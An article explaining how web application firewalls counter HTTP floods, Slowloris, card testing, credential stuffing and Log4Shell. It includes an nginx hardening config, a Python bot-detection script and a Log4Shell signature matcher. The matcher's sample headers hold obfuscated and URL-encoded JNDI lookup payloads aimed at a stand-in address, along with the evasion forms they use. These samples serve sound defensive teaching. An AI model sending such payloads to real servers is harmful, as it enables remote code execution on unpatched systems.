A WAF (Web Application Firewall) is a physical or virtual appliance, or a hosted service, placed in front of web (application) servers to block attacks while letting legitimate user traffic pass through. WAFs have become increasingly sophisticated since they were first conceived in the late 1990s. They started out as simple filters for disallowed characters in requests; they have since progressed to protection against distributed denial of service (DDoS) and bot attacks, and to rapid, signature-based defense against newly disclosed software vulnerabilities. Many also provide load balancing and TLS offloading as standard companion capabilities.
A WAF functions like a firewall, but unlike a traditional firewall, which works at layers 3 and 4 and blocks by IP address and port, a WAF inspects traffic at the application layer (layer 7). Because it sees whole HTTP requests rather than packets, it can identify and stop higher-level DDoS attacks. The most common are HTTP floods, whether basic, randomized, or cache-bypassing (requests crafted so that caches cannot answer them and every one reaches the origin server), and, at the opposite end from volumetric attacks, Slowloris. Flood attacks deny service in a straightforward way: they send more requests than the server can handle. Slowloris instead opens many connections and sends request headers a few bytes at a time, never completing the request, so that each connection stays open until the server's connection pool is exhausted. These attacks can be difficult to identify because each individual request looks very much like legitimate traffic.
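Slowloris is the case a rate limit alone does not catch, because a slow client sends almost nothing. The defense is a deadline on how long a client may take to finish a request, plus a cap on concurrent connections per source. The following is an added example using nginx directives (not configuration from the original article); the timeout values and per-source limits are illustrative assumptions to tune per site, and the upstream address is hypothetical.

```nginx
# nginx defaults, shown for contrast: a client may take 60 s to send its headers,
# 60 s between body chunks, and hold an idle keepalive connection for 75 s.
# client_header_timeout 60s;
# client_body_timeout   60s;
# keepalive_timeout     75s;

http {
    # Shorter deadlines for slow senders. A browser finishes its request headers
    # in well under a second on any reasonable link; a Slowloris client never does.
    client_header_timeout 10s;
    client_body_timeout   10s;
    send_timeout          10s;
    keepalive_timeout     15s;

    # Cap concurrent connections per source so one host cannot fill the pool.
    limit_conn_zone $binary_remote_addr zone=perip:10m;
    # Cap request rate per source for plain HTTP floods.
    limit_req_zone  $binary_remote_addr zone=perip_req:10m rate=10r/s;

    server {
        listen 80;
        limit_conn perip 20;
        limit_req  zone=perip_req burst=20 nodelay;

        location / {
            proxy_pass http://127.0.0.1:8080;   # hypothetical application backend
        }
    }
}
```

Two caveats a practitioner should check before copying this: if the server sits behind a CDN or load balancer, `$binary_remote_addr` is the proxy's address and every client shares one bucket, so the real client address has to be restored first (nginx's `real_ip` module) or the limits enforced at the edge; and the per-source caps only help against a single slow host, since a distributed Slowloris spreads its connections across many sources and is better answered at a WAF or CDN that can pool that view.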
Although DDoS attacks are conducted with bots, bots are also used for other purposes, and by some estimates bot traffic accounts for around 40% of all internet traffic. The most common other uses are credit card cracking, account takeover, and content or price scraping. Credit card cracking (also called card testing) starts from stolen card numbers associated with names; bots then attempt to guess the remaining fields, the CVV, expiration date and billing postal code, by submitting small purchases in parallel across many different vendor sites and observing which combinations are accepted. Account takeover, often called credential stuffing, is where a bot tries username/password combinations compromised from one site against many other sites, on the theory that people reuse the same username and password because it is easier to remember. Last is content scraping: content is copied from its original owner and republished without permission, which undermines the owner's search engine optimization. Other scraping includes price scraping for competitive monitoring and contact scraping for spammers.
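What a WAF or bot-management layer actually does with the patterns described in the two paragraphs above is velocity analysis per client: an HTTP flood is too many requests from one source, credential stuffing is too many different usernames failing login from one source, and card testing is too many different cards being declined from one source. The following is an added example (not code from the original article or any WAF vendor) that runs those three checks over a constructed JSON-lines application log. The log format, the thresholds, the 10-second window, and the use of HTTP 402 as the decline status are all assumptions made for the example.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Thresholds are illustrative assumptions for this example, not vendor defaults.
WINDOW_SECONDS = 10      # sliding window over which each client is judged
FLOOD_REQUESTS = 50      # more than this many requests in the window = flood
STUFFING_USERS = 5       # distinct usernames failing login in the window
CARD_TEST_CARDS = 3      # distinct cards failing checkout in the window

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_events(text):
    """Parse JSON-lines events, attach a datetime, and sort by time."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["t"] = datetime.strptime(ev["ts"], TS_FMT).replace(tzinfo=timezone.utc)
            events.append(ev)
    events.sort(key=lambda e: e["t"])
    return events


class SlidingWindow:
    """Per-key queue of (time, value) pairs, trimmed to the last N seconds."""

    def __init__(self, seconds):
        self.seconds = seconds
        self.items = defaultdict(deque)

    def add(self, key, t, value=None):
        q = self.items[key]
        q.append((t, value))
        # Events arrive sorted, so q[0] is the oldest; the newest entry is never dropped.
        while (t - q[0][0]).total_seconds() > self.seconds:
            q.popleft()
        return q


def detect(events):
    """Return {client_ip: set(labels)} for clients that match a bot pattern."""
    flagged = defaultdict(set)
    requests = SlidingWindow(WINDOW_SECONDS)
    logins = SlidingWindow(WINDOW_SECONDS)
    cards = SlidingWindow(WINDOW_SECONDS)
    for ev in events:
        ip, t = ev["ip"], ev["t"]
        # HTTP flood: volume alone, regardless of path or status.
        if len(requests.add(ip, t)) > FLOOD_REQUESTS:
            flagged[ip].add("http-flood")
        # Credential stuffing: many *different* usernames rejected from one client.
        # A person mistyping their own password repeats one username and is not flagged.
        if ev["path"] == "/login" and ev["status"] == 401 and "user" in ev:
            q = logins.add(ip, t, ev["user"])
            if len({u for _, u in q}) >= STUFFING_USERS:
                flagged[ip].add("credential-stuffing")
        # Card testing: many different cards declined on small purchases from one client.
        if ev["path"] == "/checkout" and ev["status"] == 402 and "card_last4" in ev:
            q = cards.add(ip, t, ev["card_last4"])
            if len({c for _, c in q}) >= CARD_TEST_CARDS:
                flagged[ip].add("card-testing")
    return dict(flagged)


def _event(seconds, ip, method, path, status, **extra):
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    ev = {"ts": (base + timedelta(seconds=seconds)).strftime(TS_FMT),
          "ip": ip, "method": method, "path": path, "status": status}
    ev.update(extra)
    return json.dumps(ev)


def build_sample_log():
    """Constructed sample traffic (not real logs) covering each pattern above."""
    lines = []
    # A person browsing: six requests spread over a minute.
    lines += [_event(i * 10, "203.0.113.7", "GET", "/products", 200) for i in range(6)]
    # An HTTP flood: 60 requests in six seconds, all answered 200.
    lines += [_event(i // 10, "198.51.100.9", "GET", "/", 200) for i in range(60)]
    # Credential stuffing: eight different usernames, all rejected.
    lines += [_event(20 + i, "192.0.2.33", "POST", "/login", 401, user=f"user{i}") for i in range(8)]
    # Card testing: five $1 charges against five different cards, all declined.
    lines += [_event(30 + i, "192.0.2.44", "POST", "/checkout", 402, card_last4=f"00{i}1", amount=1.0)
              for i in range(5)]
    # A real user mistyping their password twice, then logging in.
    lines += [_event(40, "192.0.2.55", "POST", "/login", 401, user="alice"),
              _event(41, "192.0.2.55", "POST", "/login", 401, user="alice"),
              _event(42, "192.0.2.55", "POST", "/login", 200, user="alice")]
    return "\n".join(lines)


if __name__ == "__main__":
    for ip, labels in sorted(detect(parse_events(build_sample_log())).items()):
        print(ip, sorted(labels))
```

The point of keying on distinct usernames and distinct cards, rather than on failure counts alone, is to separate the bot from the person who fat-fingers a password twice: the two look identical by request count. Real deployments key on more than the source address (session, device fingerprint, JA3/TLS fingerprint), because a botnet spreads its attempts across thousands of addresses and falls under any per-IP threshold. Note that this log-based approach cannot see Slowloris at all, since a slow request that never completes never produces a log line; that case has to be handled at the connection level.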
WAFs also provide a level of protection that is more agile than a code fix: signature updates and protection profiles can be deployed within hours of a disclosure such as Log4Shell (CVE-2021-44228 in Log4j), long before the affected software can be patched and redeployed. This so-called virtual patching buys the site's developers time to update the software and remediate the risk. It is a stopgap rather than a fix, because attackers quickly find request encodings that slip past the first signatures, so the underlying upgrade still has to happen.
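Why a virtual patch is a stopgap is easiest to see in the rule itself. The following is an added example (not code from the original article or from any WAF product) of the kind of signature a WAF shipped for Log4Shell: a first-day literal match on `${jndi:`, beside a hardened version that URL-decodes and collapses the publicly documented Log4j lookup obfuscations (`${lower:x}`, `${upper:x}`, and the `${name:-x}` default-value form) before matching. The request headers are constructed for the example, and 203.0.113.5 is a documentation address.

```python
import re
from urllib.parse import unquote

# First-day signature style: a literal match on the lookup prefix.
NAIVE_RULE = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Log4j lookup forms that were used to evade literal matching during the
# Log4Shell response: ${lower:x}/${upper:x} case lookups, and the default-value
# syntax ${name:-x} (including the degenerate ${::-x}), which evaluates to x.
# Character classes exclude $, { and } so only innermost lookups match; the
# fixed-point loop in normalize() then peels nested layers one round at a time.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# Final rule applied to the normalized value.
HARDENED_RULE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_case(m):
    text = m.group(2)
    return text.lower() if m.group(1).lower() == "lower" else text.upper()


def normalize(value, max_rounds=8):
    """URL-decode and collapse innermost lookups until nothing changes.
    The round limit keeps a hostile input from tying up the WAF."""
    for _ in range(max_rounds):
        before = value
        value = unquote(value)                              # %24%7B -> ${
        value = CASE_LOOKUP.sub(_resolve_case, value)       # ${lower:J} -> j
        value = DEFAULT_LOOKUP.sub(lambda m: m.group(1), value)  # ${::-j} -> j
        if value == before:
            break
    return value


def naive_match(value):
    return bool(NAIVE_RULE.search(value))


def hardened_match(value):
    return bool(HARDENED_RULE.search(normalize(value)))


def scan_request(headers):
    """Return the names of headers whose values contain a JNDI lookup.
    A real WAF scans the query string, body and cookies as well; headers were
    the classic Log4Shell vector because they are so often logged verbatim."""
    return [name for name, value in headers.items() if hardened_match(value)]


# Constructed request headers, not a captured request.
SAMPLE_HEADERS = {
    "Host": "shop.example",
    "User-Agent": "${${lower:j}ndi:ldap://203.0.113.5/a}",
    "X-Forwarded-For": "%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D",
    "Accept": "text/html",
    "Referer": "https://shop.example/?price=${amount}",
}

if __name__ == "__main__":
    for name, value in SAMPLE_HEADERS.items():
        print(f"{name:16} naive={naive_match(value)!s:5} hardened={hardened_match(value)}")
    print("blocked on:", scan_request(SAMPLE_HEADERS))
```

The naive rule misses both malicious headers in the sample, the hardened one catches them and leaves the benign `${amount}` alone. That is the pattern of every virtual patch: each revision of the rule closes the encodings seen so far, and the next bypass is a matter of time, which is why the signature buys time for the upgrade rather than replacing it.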
In today's world, with nation-state actors bankrolling whole communities of hackers, every web server of consequence should be protected by a WAF.
By William (Chris) Vest, Sr. Systems Administrator